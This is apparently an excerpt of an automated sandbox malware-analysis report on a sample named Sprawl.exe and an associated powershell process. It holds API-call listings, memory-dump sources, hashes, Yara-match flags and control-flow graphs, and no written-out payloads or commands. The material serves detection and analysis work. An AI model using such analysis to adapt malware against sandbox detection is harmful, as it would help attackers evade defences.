                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3808545654-0
                                                                                                                            • Opcode ID: c2a9d05608db3b551cbe7321e8fd88224b197bc40f94a71f0fff53b7c1922a27
                                                                                                                            • Instruction ID: ad7d238852a8d87b5aaa3e6a204337ae93e1cce4a0b470fbec170e72a625d374
                                                                                                                            • Opcode Fuzzy Hash: c2a9d05608db3b551cbe7321e8fd88224b197bc40f94a71f0fff53b7c1922a27
                                                                                                                            • Instruction Fuzzy Hash: EA01D632944340AFEB0177B0AE4EBAA3FB49759309F108479F201B62E2C6790052CF6F
                                                                                                                            APIs
                                                                                                                            • lstrlenA.KERNEL32(00429868,00429868,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404624,000000DF,00000000,00000400,?), ref: 004047A7
                                                                                                                            • wsprintfA.USER32 ref: 004047AF
                                                                                                                            • SetDlgItemTextA.USER32(?,00429868), ref: 004047C2
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                                                                            • String ID: %u.%u%s%s
                                                                                                                            • API String ID: 3540041739-3551169577
                                                                                                                            • Opcode ID: 1472cf9e36570b38fa99e832c46bb30f5d20a58f0764e004e3f2a6e79c89f0d0
                                                                                                                            • Instruction ID: 053aaa49463ee093dad042f908cd6657d31450f6c5b0c7846562dfb37f065ee1
                                                                                                                            • Opcode Fuzzy Hash: 1472cf9e36570b38fa99e832c46bb30f5d20a58f0764e004e3f2a6e79c89f0d0
                                                                                                                            • Instruction Fuzzy Hash: 0E11E473A041283BDB0065A99C45EAF3288DB82374F254237FA25F71D1EA78CC1286A8
                                                                                                                            APIs
                                                                                                                            • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 004057A7
                                                                                                                            • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 004057B0
                                                                                                                            • lstrcatA.KERNEL32(?,00409014), ref: 004057C1
                                                                                                                            Strings
                                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004057A1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CharPrevlstrcatlstrlen
                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                            • API String ID: 2659869361-3936084776
                                                                                                                            • Opcode ID: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                                                                                                            • Instruction ID: 31daa9478c60f2ec517fa6cf0afa0cd81b34b06dfe81de980877f4a94ee531a8
                                                                                                                            • Opcode Fuzzy Hash: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                                                                                                            • Instruction Fuzzy Hash: 8ED0A762505D306BE21226155C09D8B2A08CF12740B044027F100B61E1C63C4D414FFD
                                                                                                                            APIs
                                                                                                                            • DestroyWindow.USER32(00000000,00000000,00402DE2,00000001), ref: 00402C15
                                                                                                                            • GetTickCount.KERNEL32 ref: 00402C33
                                                                                                                            • CreateDialogParamA.USER32(0000006F,00000000,00402B7F,00000000), ref: 00402C50
                                                                                                                            • ShowWindow.USER32(00000000,00000005), ref: 00402C5E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2102729457-0
                                                                                                                            • Opcode ID: 42481ae060c013658952b0ba65f2133d3ed78682e8b262a627202bc2b689c50f
                                                                                                                            • Instruction ID: 1b84634240e2166e3851fbc92cd381e461e1db94d3428fd6ef6110bf0b183a31
                                                                                                                            • Opcode Fuzzy Hash: 42481ae060c013658952b0ba65f2133d3ed78682e8b262a627202bc2b689c50f
                                                                                                                            • Instruction Fuzzy Hash: 97F05E30A09220EFD6317B20FE4CD9F7BA4BB04B15B404976F104B11EAC7782882CB9D
                                                                                                                            APIs
                                                                                                                            • FreeLibrary.KERNEL32(?,76233410,00000000,C:\Users\user\AppData\Local\Temp\,004035F2,0040340C,?), ref: 00403634
                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 0040363B
                                                                                                                            Strings
                                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 0040361A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Free$GlobalLibrary
                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                            • API String ID: 1100898210-3936084776
                                                                                                                            • Opcode ID: dccbf9c36de3459267eb1af99735bed06c7a158201479be104942c1c24015bd8
                                                                                                                            • Instruction ID: 1a9bfca33d817e772708c534a1c0ef1eeb9da564593c1c7aee7843147688a1a4
                                                                                                                            • Opcode Fuzzy Hash: dccbf9c36de3459267eb1af99735bed06c7a158201479be104942c1c24015bd8
                                                                                                                            • Instruction Fuzzy Hash: 60E08C329050606BC6316F15ED04B2E76A9AB48B22F42006AEA407B3A08B756C424BCC
                                                                                                                            APIs
                                                                                                                            • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CD2,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Sprawl.exe,C:\Users\user\Desktop\Sprawl.exe,80000000,00000003), ref: 004057EE
                                                                                                                            • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CD2,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Sprawl.exe,C:\Users\user\Desktop\Sprawl.exe,80000000,00000003), ref: 004057FC
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CharPrevlstrlen
                                                                                                                            • String ID: C:\Users\user\Desktop
                                                                                                                            • API String ID: 2709904686-3125694417
                                                                                                                            • Opcode ID: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
                                                                                                                            • Instruction ID: 563d0c8124584ba78a4db43b9ec919a88ee2b9567cf051c7da1bb821b6b33a35
                                                                                                                            • Opcode Fuzzy Hash: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
                                                                                                                            • Instruction Fuzzy Hash: 48D0A773808D705FF34362109C04B8F6B48CF12740F094062E140A71D0C2780C414BBD
                                                                                                                            APIs
                                                                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405917
                                                                                                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 0040592F
                                                                                                                            • CharNextA.USER32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405940
                                                                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405949
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 190613189-0
                                                                                                                            • Opcode ID: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
                                                                                                                            • Instruction ID: 9438e9cad6691fea7f13f8d56426e11099e03f26c07faecbb185dc05f13043cf
                                                                                                                            • Opcode Fuzzy Hash: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
                                                                                                                            • Instruction Fuzzy Hash: D5F06236505518FFCB129FA5DC00D9EBBA8EF16360B2540B9F800F7350D674EE01ABA9

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:3.7%
                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                            Signature Coverage:16.7%
                                                                                                                            Total number of Nodes:24
                                                                                                                            Total number of Limit Nodes:3
                                                                                                                            execution_graph 30232 b78b21b 30233 b78e434 30232->30233 30234 b78b284 30232->30234 30248 b78e439 30233->30248 30235 b78e5c5 30234->30235 30236 b78b297 30234->30236 30252 b78e434 NtResumeThread 30235->30252 30244 b78b2fb 30236->30244 30241 b78e5ef 30253 b78e434 NtResumeThread 30241->30253 30246 b78b331 30244->30246 30247 b78b2cb 30246->30247 30254 b78dbaa NtResumeThread 30246->30254 30249 b78e487 30248->30249 30249->30249 30250 b78e49f NtResumeThread 30249->30250 30251 b78e4b6 30250->30251 30251->30251 30252->30241 30253->30241 30254->30246 30255 b78d8ce 30256 b78d8d5 30255->30256 30258 b78d9a8 30256->30258 30259 b78d994 30256->30259 30263 b78d307 NtResumeThread 30256->30263 30259->30258 30265 b78e434 NtResumeThread 30259->30265 30261 b78e5ef 30264 b78e434 NtResumeThread 30261->30264 30264->30261 30265->30261

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 84 b78e439-b78e484 85 b78e487-b78e48e 84->85 85->85 86 b78e490-b78e4b4 call b78e4e3 NtResumeThread 85->86 89 b78e4b6-b78e4bd 86->89 89->89 90 b78e4bf-b78e4c7 89->90
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2786477517.000000000B78B000.00000040.00001000.00020000.00000000.sdmp, Offset: 0B78B000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_b78b000_powershell.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ResumeThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 947044025-0
                                                                                                                            • Opcode ID: 2a3a006607e5e828a537991fca93b5330f4120939df3164094c71d549461c120
                                                                                                                            • Instruction ID: 370c62671592c4f5557668a087fb16b2ff947600cbcfb68fa56ff1e766c57567
                                                                                                                            • Opcode Fuzzy Hash: 2a3a006607e5e828a537991fca93b5330f4120939df3164094c71d549461c120
                                                                                                                            • Instruction Fuzzy Hash: FE015E7564064A8FDF35EE78C8983CE3763EF99354FA08439D88A8B648D735958ACB01
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2725590394.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_4d20000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: aa0aa3d0513a1b1798f479a0fe2ab0652f75998ab83c20da7c9d94fe94c0e297
                                                                                                                            • Instruction ID: 7a43867ba9c419af1e0df945e9a9ae3423f5b14707525559cd7a24b0b17933a1
                                                                                                                            • Opcode Fuzzy Hash: aa0aa3d0513a1b1798f479a0fe2ab0652f75998ab83c20da7c9d94fe94c0e297
                                                                                                                            • Instruction Fuzzy Hash: E152BF34B00229CFDB24CF24C9547ADBBB2BF95709F1045AAE949E7250EB70AD85CF51
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2762149689.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7850000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: ec83c1abf56c3746deeb2f51f0c2315c89baa00604ff776c5d354cb92f9b41b9
                                                                                                                            • Instruction ID: eb20424b9cd080f685734b76e5c8d841b6b1cd401e3ab19dd4ebc062cd1c9ed3
                                                                                                                            • Opcode Fuzzy Hash: ec83c1abf56c3746deeb2f51f0c2315c89baa00604ff776c5d354cb92f9b41b9
                                                                                                                            • Instruction Fuzzy Hash: 4C926DB0A00305DFD714CB98C455B9ABBB2FF89714F258069E909AF751CB76EC82CB91
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2762149689.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7850000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2680d78b8db22d4ccc6e589e5275ffc9c4b37a0345c123beb91837fdb33d193f
                                                                                                                            • Instruction ID: 9f8f581eddb5db33de60616617c501f387b63bfe4c04bccb178f810bd30dad42
                                                                                                                            • Opcode Fuzzy Hash: 2680d78b8db22d4ccc6e589e5275ffc9c4b37a0345c123beb91837fdb33d193f
                                                                                                                            • Instruction Fuzzy Hash: C4725DB4A00305DFDB14CB98C445B9AB7B2FF89714F258459E909AF391CB76EC82CB91

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 963 785b7c8-785b7ea 964 785b905-785b936 963->964 965 785b7f0-785b7f5 963->965 973 785b9ae-785b9f2 964->973 974 785b938-785b940 964->974 966 785b7f7-785b7fd 965->966 967 785b80d-785b811 965->967 969 785b801-785b80b 966->969 970 785b7ff 966->970 971 785b8b7-785b8c1 967->971 972 785b817-785b819 967->972 969->967 970->967 975 785b8c3-785b8cb 971->975 976 785b8ce-785b8d4 971->976 977 785b829 972->977 978 785b81b-785b827 972->978 995 785bc01-785bc60 973->995 996 785b9f8-785b9fd 973->996 980 785b942-785b948 974->980 981 785b958-785b95a 974->981 983 785b8d6-785b8d8 976->983 984 785b8da-785b8e6 976->984 982 785b82b-785b82d 977->982 978->982 986 785b94c-785b956 980->986 987 785b94a 980->987 990 785b964-785b96e 981->990 991 785b95c-785b961 981->991 982->971 985 785b833-785b835 982->985 988 785b8e8-785b902 983->988 984->988 992 785b837-785b83d 985->992 993 785b84f-785b85b 985->993 986->981 987->981 997 785b970-785b975 990->997 998 785b978-785b97e 990->998 1001 785b841-785b84d 992->1001 1002 785b83f 992->1002 1020 785b873-785b8b4 993->1020 1021 785b85d-785b863 993->1021 1018 785d904-785d90e 995->1018 1019 785bc66-785bc83 995->1019 1004 785ba15-785ba19 996->1004 1005 785b9ff-785ba05 996->1005 999 785b984-785b990 998->999 1000 785b980-785b982 998->1000 1007 785b992-785b9ab 999->1007 1000->1007 1001->993 1002->993 1008 785bbac-785bbb6 1004->1008 1009 785ba1f-785ba23 1004->1009 1012 785ba07 1005->1012 1013 785ba09-785ba13 1005->1013 1022 785bbc4-785bbca 1008->1022 1023 785bbb8-785bbc1 1008->1023 1016 785ba25-785ba34 1009->1016 1017 785ba36 1009->1017 1012->1004 1013->1004 1029 785ba38-785ba3a 1016->1029 1017->1029 1030 785bc85-785bc8e 1019->1030 1031 785bca4 1019->1031 1032 785b865 1021->1032 1033 785b867-785b869 1021->1033 1026 785bbd0-785bbdc 1022->1026 1027 785bbcc-785bbce 1022->1027 1039 785bbde-785bbfe 1026->1039 1027->1039 1029->1008 1036 785ba40-785ba60 1029->1036 1037 785bc95-785bc98 1030->1037 1038 785bc90-785bc93 1030->1038 1040 785bca7-785bd09 1031->1040 1032->1020 1033->1020 1050 785ba62-785ba72 1036->1050 1051 785ba9f 1036->1051 1043 785bca2 1037->1043 1038->1043 1054 785bd12-785bd33 1040->1054 1055 785bd0b 1040->1055 1043->1040 1050->995 1064 785ba78-785ba7d 1050->1064 1053 785baa1-785baa3 1051->1053 1053->1008 1056 785baa9-785baad 1053->1056 1060 785bd35-785bd5a 1054->1060 1061 785bd62-785bdd2 1054->1061 1055->1054 1058 785bea0-785bec1 1055->1058 1059 785bdd9-785bdfa 1055->1059 1062 785bac0 1056->1062 1063 785baaf-785babe 1056->1063 1067 785bef0-785bffd 1058->1067 1068 785bec3-785bee8 1058->1068 1070 785bdfc-785be21 1059->1070 1071 785be29-785be99 1059->1071 1060->1061 1061->1059 1069 785bac2-785bac4 1062->1069 1063->1069 1065 785ba95-785ba9d 1064->1065 1066 785ba7f-785ba85 1064->1066 1065->1053 1072 785ba87 1066->1072 1073 785ba89-785ba93 1066->1073 1117 785c003-785c01d 1067->1117 1118 785c2f9-785c324 1067->1118 1068->1067 1069->1008 1076 785baca-785baea 1069->1076 1070->1071 1071->1058 1072->1065 1073->1065 1089 785bb02-785bb08 1076->1089 1090 785baec-785baf2 1076->1090 1095 785bb2b 1089->1095 1096 785bb0a-785bb13 1089->1096 1093 785baf4 1090->1093 1094 785baf6-785baf8 1090->1094 1093->1089 1094->1089 1100 785bb2e-785bb3a 1095->1100 1098 785bb15-785bb18 1096->1098 1099 785bb1a-785bb27 1096->1099 1102 785bb29 1098->1102 1099->1102 1106 785bb52-785bba9 1100->1106 1107 785bb3c-785bb42 1100->1107 1102->1100 1108 785bb44 1107->1108 1109 785bb46-785bb48 1107->1109 1108->1106 1109->1106 1121 785c047 1117->1121 1122 785c01f-785c02b 1117->1122 1131 785c329-785c370 1118->1131 1125 785c04d-785c0a1 1121->1125 1123 785c035-785c03b 1122->1123 1124 785c02d-785c033 1122->1124 1127 785c045 1123->1127 1124->1127 1125->1118 1134 785c0a7-785c0c1 1125->1134 1127->1125 1131->1018 1138 785c0c3-785c0cf 1134->1138 1139 785c0eb 1134->1139 1140 785c0d1-785c0d7 1138->1140 1141 785c0d9-785c0df 1138->1141 1143 785c0f1-785c126 1139->1143 1144 785c0e9 1140->1144 1141->1144 1143->1118 1147 785c12c-785c14c 1143->1147 1144->1143 1147->1118 1149 785c152-785c17d 1147->1149 1149->1118 1151 785c183-785c284 1149->1151 1151->1118 1163 785c286-785c2a5 1151->1163 1165 785c2af-785c2c6 1163->1165 1166 785c2d0-785c2f7 1165->1166 1166->1131
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2762149689.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7850000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: bf224f50946ce0ad3f012fae09d59a313595ac593160e6e2a7512f5348177aa1
                                                                                                                            • Instruction ID: 49f1300827e5756d0c76f753daf85d9b23ce38f04aa706403f74104b650b2ed0
                                                                                                                            • Opcode Fuzzy Hash: bf224f50946ce0ad3f012fae09d59a313595ac593160e6e2a7512f5348177aa1
                                                                                                                            • Instruction Fuzzy Hash: D06291B0A00219CFDB14DF68C854BAABBB2FF95354F1080A9D909AB751DB72DD81CF91
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2762149689.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7850000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2dd257377f5eeb21f9502455d2054a3f2e5f939be9e91fd746ef2dda0d804679
                                                                                                                            • Instruction ID: 286109fb6b0f816b6350c48529b51d937be5963ed776c518803783f01f9a9d99
                                                                                                                            • Opcode Fuzzy Hash: 2dd257377f5eeb21f9502455d2054a3f2e5f939be9e91fd746ef2dda0d804679
                                                                                                                            • Instruction Fuzzy Hash: F7527DB4B00215DFDB10DB58C844F99BBB2BF88748F14C4D8E909AB751DB72ED828B61
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2762149689.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7850000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: a5933267d908922c46a7fad942e44fc48f3f3b2673275b47de986f309956687d
                                                                                                                            • Instruction ID: cc5dfdc51c4ea8e64e28da3f61df417cdac2207931f0d8d11fe79cac95cc6e34
                                                                                                                            • Opcode Fuzzy Hash: a5933267d908922c46a7fad942e44fc48f3f3b2673275b47de986f309956687d
                                                                                                                            • Instruction Fuzzy Hash: 09425FB4B00215DFD754DB58CC50BAAB7A2BFC9744F148099E909AF391CB72ED828F91
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2762149689.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
